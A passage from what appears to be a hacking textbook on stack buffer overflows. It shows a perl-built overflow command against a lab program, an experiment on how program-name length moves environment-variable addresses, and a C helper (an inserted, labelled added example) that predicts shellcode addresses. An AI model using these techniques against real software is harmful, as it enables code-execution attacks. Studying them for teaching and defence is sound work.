reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x46\xff\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $
To predict an exact memory address, the differences between the observed
addresses must be explored. The length of the name of the program being
executed appears to affect the address of the environment variables. This
effect can be explored further by changing the name of the program and
experimenting. This kind of experimentation and pattern recognition is an
important skill for a hacker to have.
reader@hacking:~/booksrc $ cp a.out a
reader@hacking:~/booksrc $ ./a SLEDLESS
SLEDLESS is at 0xbfffff4e
reader@hacking:~/booksrc $ cp a.out bb
reader@hacking:~/booksrc $ ./bb SLEDLESS
SLEDLESS is at 0xbfffff4c
reader@hacking:~/booksrc $ cp a.out ccc
reader@hacking:~/booksrc $ ./ccc SLEDLESS
SLEDLESS is at 0xbfffff4a
reader@hacking:~/booksrc $ ./a.out SLEDLESS
SLEDLESS is at 0xbfffff46
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfffff4e - 0xbfffff46
$1 = 8
(gdb) quit
reader@hacking:~/booksrc $
As the preceding experiment shows, the length of the name of the executing
program affects the location of exported environment variables. The general
trend is a decrease of two bytes in the address of the environment variable
for every one-byte increase in the length of the program name. This holds for
the name a.out as well: the difference in length between the names a.out and a
is four bytes, and the difference between the addresses 0xbfffff4e and
0xbfffff46 is eight bytes. This means the name of the executing program must
also be located on the stack somewhere above the environment strings, which is
what causes the shifting. (On Linux the kernel copies the executable's path
string to the very top of the stack, above the environment strings, and bash
also passes the path it used to invoke the command in the exported variable
named _ (underscore); every copy of the name that sits above the target
variable shifts it by one byte per byte of name length, which is consistent
with the two-for-one shift observed here.)
Armed with this knowledge, the exact address of the environment variable can
be predicted when the vulnerable program is executed, so the crutch of a NOP
sled can be eliminated. The getenvaddr.c program adjusts the address for the
difference in program name length to give a very accurate prediction.
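To make the adjustment concrete, the following is an added example in the spirit of getenvaddr.c; it is not the book's code (the book's own listing is cut off on this page after its #include lines), and the function name predict_env_addr, the name-length shift factor and the ASLR check are this example's own choices. It assumes the book's lab setup: Linux x86, address-space randomization disabled, the same shell environment for both runs, and the target name passed exactly as it will be typed on the command line (including any ./ prefix), since argv[0] is compared against it.

```c
/* Added example, not the book's getenvaddr.c: predict where an exported
 * environment variable will sit in another program's stack, given its
 * address in this program. Uses the rule observed in the experiment above:
 * the environment moves two bytes lower for every extra byte of program name.
 * Assumes Linux, no ASLR, and an otherwise identical environment. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bytes the environment shifts per byte of program-name length (observed). */
#define BYTES_PER_NAME_BYTE 2

/* env_addr: address of the variable in the program named this_name.
 * Returns the address it will have in the program named target_name.
 * A longer target name gives a lower address; arithmetic is done on
 * uintptr_t so a negative difference wraps correctly. */
uintptr_t predict_env_addr(uintptr_t env_addr, const char *this_name,
                           const char *target_name)
{
    long name_diff = (long)strlen(this_name) - (long)strlen(target_name);
    return env_addr + (uintptr_t)(name_diff * BYTES_PER_NAME_BYTE);
}

/* Caveat the book's lab does not need: with ASLR on, the stack base changes
 * on every exec and no prediction of this kind is reliable. Returns 1 if
 * randomize_va_space is present and non-zero, 0 otherwise. */
int aslr_enabled(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (f == NULL)
        return 0;            /* not Linux or not readable: cannot tell */
    int c = fgetc(f);
    fclose(f);
    return c != EOF && c != '0';
}

int main(int argc, char *argv[])
{
    if (argc < 3) {
        fprintf(stderr, "Usage: %s <environment variable> <target program name>\n",
                argv[0]);
        return 1;
    }
    char *ptr = getenv(argv[1]);
    if (ptr == NULL) {       /* variable not exported: nothing to predict */
        fprintf(stderr, "%s is not in the environment\n", argv[1]);
        return 1;
    }
    if (aslr_enabled())
        fprintf(stderr, "warning: ASLR is enabled, prediction will not hold\n");

    uintptr_t predicted = predict_env_addr((uintptr_t)ptr, argv[0], argv[2]);
    printf("%s will be at %p\n", argv[1], (void *)predicted);
    return 0;
}
```

Run as `./getenvaddr SLEDLESS ./notesearch` from the same shell that exported SLEDLESS. The two-byte factor is an empirical constant from this experiment, not a law; if a different shell or kernel places a different number of copies of the name above the environment, rerun the renaming experiment and adjust BYTES_PER_NAME_BYTE.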
getenvaddr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>